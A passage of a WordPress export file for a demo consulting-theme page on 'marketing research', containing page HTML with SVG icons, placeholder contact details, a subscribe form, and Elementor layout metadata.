 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

finance planning
</a></li>
</ul>
<h5>Contacts</h5>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home2.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-consulting/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>898</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:28:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:28:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[marketing-research]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"317e6d4","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"efbeefb","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"f82bab9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"d516166","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"611317c","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"9a4f025","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"35a9e19","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"34206bb","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"04ace53","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"1ce0cf2","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"725e97b","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"d809972","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5d64ec6","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"19280c6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7205aed","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Inter","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#4B83FC","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"84e6cfd","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"25b91f9","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"9d81515","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"42baa2b","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3ee3642","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5b13621","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"8317533","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"38","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c212bb7","elType":"section","settings":{"gap":"extended","structure":"20","layout":"full_width"},"elements":[{"id":"47aaa4f","elType":"column","settings":{"_column_size":50,"_inline_size":55},"elements":[{"id":"72dea83","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart1-service-home2.png","id":1485},"image_size":"full","width":{"unit":"%","size":100,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"fe0af4f","elType":"column","settings":{"_column_size":50,"_inline_size":45},"elements":[{"id":"c0a1253","elType":"widget","settings":{"editor":"Nurture promoters, your loyal customers who are more profitable and will advocate for your business\u2014both in good times and bad.\n\nCustomer-focused businesses build a virtuous cycle we call the <span style=\"color: #4b83fc;\">\"customer wheel.\"<\/span> We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements."},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"94af6c9","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"4e4cb68","elType":"widget","settings":{"title":"Services","header_size":"h5","typography_font_family":"Roboto","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"1ebc8a8","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"3d2f32e","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"83881c6","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"fcdefbb","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"82d1d05","elType":"widget","settings":{"text":"Divider","color":"#4B83FC","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"2301f15","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#4B83FC","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"86a5b1b","elType":"widget","settings":{"title":"Contacts","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"cb92309","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"5","left":"0","isLinked":false}},"elements":[{"id":"2b9345c","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"798f2b3","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"46c4dc2","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"a5a16d3","elType":"widget","settings":{"text":"Divider","color":"#4B83FC","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"e084289","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"b3e48c6","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"492df2b","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#4B83FC","icon_size":{"unit":"px","size":18,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"600","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"400","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#1B1D21","title_typography_font_family":"Inter","description_color":"#5F5F5F","description_typography_font_family":"Open Sans","icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"icon_space_mobile":{"unit":"px","size":5,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"d978f37","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home2.jpg","id":1510},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"3964f27","elType":"section","settings":{"content_width":{"unit":"px","size":1370,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"9644d72","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d6346af","elType":"section","settings":{"content_position":"middle","structure":"20","background_background":"classic","background_color":"#4B83FC","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"6c11e45","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"8711e67","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"600","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"0fe467c","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"8fbb5e0","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"css_responce":"color:#fff;"},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:5:"image";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:3;s:10:"image_size";i:3;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:2:{s:19:"image_border_radius";i:2;s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:6;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:6;s:11:"header_size";i:6;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:3;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:3;s:22:"typography_font_family";i:1;s:11:"title_color";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:5;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:5;}}s:8:"advanced";a:2:{s:14:"_section_style";a:4:{s:8:"_padding";i:4;s:15:"_padding_mobile";i:2;s:7:"_margin";i:2;s:12:"_css_classes";i:1;}s:15:"_section_border";a:3:{s:14:"_border_border";i:1;s:13:"_border_width";i:1;s:13:"_border_color";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:5:{s:10:"text_color";i:1;s:22:"typography_font_family";i:1;s:22:"typography_font_weight";i:1;s:21:"typography_typography";i:1;s:27:"typography_font_size_mobile";i:1;}